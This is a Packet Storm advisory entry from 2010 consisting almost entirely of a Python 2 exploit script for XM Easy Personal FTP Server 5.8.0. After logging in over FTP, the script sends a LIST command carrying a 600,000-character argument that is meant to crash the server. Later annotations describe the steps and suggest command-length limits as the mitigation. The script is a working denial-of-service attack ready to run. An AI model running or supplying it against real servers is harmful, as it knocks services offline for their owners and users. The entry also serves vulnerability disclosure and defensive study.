XM Easy Personal FTP Server LIST Denial Of Service

2010-04-19T00:00:00
ID PACKETSTORM:88633
Type packetstorm
Reporter Jeremiah Talamantes
Modified 2010-04-19T00:00:00

Description

                                        
                                            `# Exploit Title: XM Easy Personal FTP Server LIST   
# Date: 4/17/2010  
# Author: Jeremiah Talamantes  
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe  
# Version: 5.8.0  
# Tested on: Windows XP, SP2  
# CVE : N/A  
# Code : http://www.redteamsecure.com/assets/company/exploits/xmftp/xmexploit.php  
  
#!/usr/bin/python  
# Start-up banner: names the tool's publisher, the affected product and
# version (XM Easy Personal FTP Server 5.8.0), the command concerned (LIST)
# and the author's contact address. Purely informational output.
banner_lines = (
    "\n#################################################################",
    "## RedTeam Security ##",
    "## XM Easy Personal FTP Server ##",
    "## Version 5.8.0 ##",
    "## LIST Vulnerability ##",
    "## ##",
    "## Jeremiah Talamantes ##",
    "## labs@redteamsecure.com ##",
    "################################################################# \n",
)
for banner_line in banner_lines:
    print banner_line
  
import socket  
import sys  
  
def Usage():
    """Print the usage line followed by the author credit.

    NOTE(review): the usage text names no arguments, although the argument
    check at the bottom of the script requires exactly three; the
    placeholders were probably lost when the page was extracted.
    """
    for text in (
        "Usage: xmexploit.py \n",
        "\n\nCredit: Jeremiah Talamantes",
        "RedTeam Security, LLC : www.redteamsecure.com/labs\n",
    ):
        print (text)
  
# Argument later appended to the LIST command: the three-character unit
# "./A" repeated 200,000 times, i.e. a 600,000-character string.
# NOTE: the name shadows Python 2's built-in `buffer` type.
buffer = "".join(["./A"] * 200000)
  
def start(hostname, username, password):
    """Log in to an FTP server and send one LIST command carrying `buffer`.

    Sequence, as written: connect to TCP port 21 on `hostname`, read and
    print the greeting, send USER and PASS, then send `list` followed by the
    module-level `buffer` string and close the socket.

    Args:
        hostname: Host to connect to; the port is fixed at 21.
        username: Value sent in the USER command.
        password: Value sent in the PASS command.

    The replies to USER and PASS are read but never inspected, and the
    socket is closed without reading a reply to LIST, so the script itself
    does not confirm either the login or the server's state afterwards.

    NOTE(review): the oversized command is sent only after USER/PASS, so the
    reported condition appears to be reached post-login. For defenders the
    observable is a single control-channel command line of roughly 600 KB;
    bounding the accepted command-line length at the server or at an
    FTP-aware proxy is the usual mitigation for this class of input.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        # Bare except: every exception type is reported as a connection
        # failure and the process exits with status 1.
        print ("Error: unable to connect to host")
        sys.exit(1)
    # Server greeting (at most 1024 bytes), echoed to the console.
    r=sock.recv(1024)
    print "[+] " + r
    # Send the username; the reply is read but not checked.
    sock.send("USER %s\r\n" %username)
    r=sock.recv(1024)
    # Send the password; again the reply is read but not checked.
    sock.send("PASS %s\r\n" %password)
    r=sock.recv(1024)
    print "Sending the malicious chars..."
    # One LIST command whose argument is the 600,000-character `buffer`.
    sock.send("list %s\r\n" %buffer)
    # Closed immediately; no reply to LIST is read.
    sock.close()
  
# Entry point. Exactly three positional arguments are required, taken in
# order as hostname, username and password; any other count prints the
# usage text and exits with status 1.
if len(sys.argv) != 4:
    Usage()
    sys.exit(1)

hostname, username, password = sys.argv[1:4]
start(hostname, username, password)
sys.exit(0)
  
# end  
`